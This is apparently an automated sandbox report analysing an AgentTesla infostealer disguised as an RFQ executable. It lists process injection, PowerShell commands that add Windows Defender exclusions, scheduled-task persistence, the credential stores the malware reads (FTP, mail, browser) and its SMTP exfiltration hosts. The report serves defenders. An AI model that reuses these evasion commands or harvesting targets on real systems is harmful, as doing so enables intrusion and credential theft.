                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 8_2_013915E8 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeMemory written: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe base: 400000 value starts with: 4D5A
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe'
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe'
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe'
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sucEaYWuNda' /XML 'C:\Users\user\AppData\Local\Temp\tmp1646.tmp'
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess created: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.816206352.0000000001BD0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.816206352.0000000001BD0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.816206352.0000000001BD0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.816206352.0000000001BD0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeQueries volume information: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeQueries volume information: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 8.2.RFQ_99705546,99805546_Mark Cansick.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ_99705546,99805546_Mark Cansick.exe.44f7b80.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ_99705546,99805546_Mark Cansick.exe.44f7b80.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.313580243.0000000004563000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.814784422.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.313035144.0000000004450000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.816654830.0000000003241000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RFQ_99705546,99805546_Mark Cansick.exe PID: 6092, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RFQ_99705546,99805546_Mark Cansick.exe PID: 6252, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: Yara matchFile source: 00000008.00000002.816654830.0000000003241000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RFQ_99705546,99805546_Mark Cansick.exe PID: 6252, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 8.2.RFQ_99705546,99805546_Mark Cansick.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ_99705546,99805546_Mark Cansick.exe.44f7b80.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ_99705546,99805546_Mark Cansick.exe.44f7b80.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.313580243.0000000004563000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.814784422.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.313035144.0000000004450000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.816654830.0000000003241000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RFQ_99705546,99805546_Mark Cansick.exe PID: 6092, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RFQ_99705546,99805546_Mark Cansick.exe PID: 6252, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation311Scheduled Task/Job1Process Injection112Masquerading11OS Credential Dumping2Security Software Discovery321Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools11Input Capture11Process Discovery2Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion241Credentials in Registry1Virtualization/Sandbox Evasion241SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSApplication Window Discovery1Distributed Component Object ModelData from Local System2Scheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsRemote System Discovery1SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing13Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery114Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 492068 Sample: RFQ_99705546,99805546_Mark ... Startdate: 28/09/2021 Architecture: WINDOWS Score: 100 35 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->35 37 Found malware configuration 2->37 39 Multi AV Scanner detection for submitted file 2->39 41 13 other signatures 2->41 7 RFQ_99705546,99805546_Mark Cansick.exe 7 2->7         started        process3 file4 23 C:\Users\user\AppData\...\sucEaYWuNda.exe, PE32 7->23 dropped 25 C:\Users\...\sucEaYWuNda.exe:Zone.Identifier, ASCII 7->25 dropped 27 C:\Users\user\AppData\Local\...\tmp1646.tmp, XML 7->27 dropped 29 RFQ_99705546,99805...ark Cansick.exe.log, ASCII 7->29 dropped 43 Adds a directory exclusion to Windows Defender 7->43 45 Injects a PE file into a foreign processes 7->45 11 RFQ_99705546,99805546_Mark Cansick.exe 6 7->11         started        15 powershell.exe 25 7->15         started        17 schtasks.exe 1 7->17         started        signatures5 process6 dnsIp7 31 smtp.regalbelloit.com 11->31 33 us2.smtp.mailhostbox.com 208.91.198.143, 49822, 49823, 587 PUBLIC-DOMAIN-REGISTRYUS United States 11->33 47 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->47 49 Moves itself to temp directory 11->49 51 Tries to steal Mail credentials (via file access) 11->51 53 3 other signatures 11->53 19 conhost.exe 15->19         started        21 conhost.exe 17->21         started        signatures8 process9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      RFQ_99705546,99805546_Mark Cansick.exe24%VirustotalBrowse
                      RFQ_99705546,99805546_Mark Cansick.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\sucEaYWuNda.exe100%Joe Sandbox ML

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      8.2.RFQ_99705546,99805546_Mark Cansick.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://POrzfIODYEW.org0%Avira URL Cloudsafe
                      http://POrzfIODYEW.o0%Avira URL Cloudsafe
                      http://PFjgsH.com0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://schemas.microsoft.0%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://smtp.regalbelloit.com0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://api.ipify.org%$0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      us2.smtp.mailhostbox.com
                      208.91.198.143
                      truefalse
                        high
                        smtp.regalbelloit.com
                        unknown
                        unknowntrue
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:HTTP/1.1RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.816654830.0000000003241000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://DynDns.comDynDNSRFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.816654830.0000000003241000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://POrzfIODYEW.orgRFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.816654830.0000000003241000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://POrzfIODYEW.oRFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.818569179.000000000355F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://PFjgsH.comRFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.816654830.0000000003241000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://us2.smtp.mailhostbox.comRFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.818706292.00000000035A7000.00000004.00000001.sdmpfalse
                            high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.816654830.0000000003241000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://schemas.microsoft.RFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.310875306.0000000004179000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.ipify.org%GETMozilla/5.0RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.816654830.0000000003241000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            low
                            http://smtp.regalbelloit.comRFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.818706292.00000000035A7000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.309447811.0000000003171000.00000004.00000001.sdmpfalse
                              high
                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipRFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.313580243.0000000004563000.00000004.00000001.sdmp, RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.814784422.0000000000402000.00000040.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://api.ipify.org%$RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.816654830.0000000003241000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              low

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              208.91.198.143
                              us2.smtp.mailhostbox.comUnited States
                              394695PUBLIC-DOMAIN-REGISTRYUSfalse

                              General Information

                              Joe Sandbox Version:33.0.0 White Diamond
                              Analysis ID:492068
                              Start date:28.09.2021
                              Start time:10:28:41
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 11m 31s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:RFQ_99705546,99805546_Mark Cansick.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
